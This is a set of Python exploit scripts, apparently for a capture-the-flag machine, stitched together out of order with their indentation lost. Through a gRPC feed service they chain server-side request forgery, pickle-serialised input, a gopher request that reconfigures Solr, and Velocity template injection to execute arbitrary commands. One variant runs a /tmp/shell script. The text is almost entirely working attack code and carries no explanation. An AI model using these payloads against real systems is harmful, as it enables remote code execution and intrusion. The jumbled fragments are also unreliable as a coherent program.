def port_check(port):
port = str(port)
json = '{"feed_url": "http://localhost:' + port + '" }'
# print(json)
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = service_pb2_grpc.PrintStub(channel)
try:
payload = pickle.dumps(json)
response = stub.Feed(service_pb2.Contents(data=b64encode(payload)))
except Exception as e:
if 'HTTP' in str(e):
return port, "OPEN"
return port, 'Closed'
return port, "unknown"
from base64 import b64encode
import concurrent.futures
def gen_payload(payload):
json = '{"feed_url": "gopher://localhost:8983/_' + payload + '" }'
# print(json)
return json
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = service_pb2_grpc.PrintStub(channel)
payload = gen_payload("POST%20/solr/staging/config%20Http/1.1%0AHost%20localhost:8983%0AContent-type:%20Application/json%0AContennt-Length:%20207%0A%0A%7B'updatequeryresponsewriter':'startup':'lazy','name':'velocity','class':'solr.VelocityResponseWriter','template.base.dir':%20'','solr.resource.loader.enabled':%20'true','params.resource.loader.enabled':%20'true'%7D%7D%0A")
payload = pickle.dumps(payload)
response = stub.Feed(service_pb2.Contents(data=b64encode(payload)))
print(response)
# with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
# jobs = []
# for port in range(0, 65535):
# jobs.append(executor.submit(port_check, port))
# for future in concurrent.futures.as_completed(jobs):
# port, output = future.result()
# print(f"{output} - {port}")
# print(port_check('8983'))
# channel = grpc.insecure_channel('10.10.10.201:9000')
# stub = service_pb2_grpc.PrintStub(channel)
# payload = pickle.dumps(port_check())
import grpc
import pickle
import service_pb2
import service_pb2_grpc
import base64
import sys
from func_timeout import func_set_timeout, FunctionTimedOut
from urllib.parse import quote
template = '{"version": "v1.0", "title": "PrinterFeed", "feed_url": "target"}'
channel = grpc.insecure_channel("10.10.10.201:9000")
stub = service_pb2_grpc.PrintStub(channel)
command = quote(sys.argv[1])
print(command)
payload = f"http://localhost:8983/solr/staging/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{command}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
feed = template.replace("target", payload)
serialized = base64.b64encode(pickle.dumps(feed))
data = stub.Feed(service_pb2.Contents(data=serialized))
print(feed)
print(data.feed)
from base64 import b64encode
import concurrent.futures
def gen_payload():
json = '{"version": "v1.0", "title": "PrinterFeed", "feed_url": "http://localhost:8983/solr/staging/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27/bin/bash%20/tmp/shell%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"}'
print(json)
return json
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = service_pb2_grpc.PrintStub(channel)
payload = gen_payload()
payload = b64encode(pickle.dumps(payload))
response = stub.Feed(service_pb2.Contents(data=payload))
print(response)
# with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
# jobs = []
# for port in range(0, 65535):
# jobs.append(executor.submit(port_check, port))
# for future in concurrent.futures.as_completed(jobs):
# port, output = future.result()
# print(f"{output} - {port}")
# print(port_check('8983'))
# channel = grpc.insecure_channel('10.10.10.201:9000')
# stub = service_pb2_grpc.PrintStub(channel)
# payload = pickle.dumps(port_check())
# response = stub.Feed(service_pb2.Contents(data=b64encode(payload)))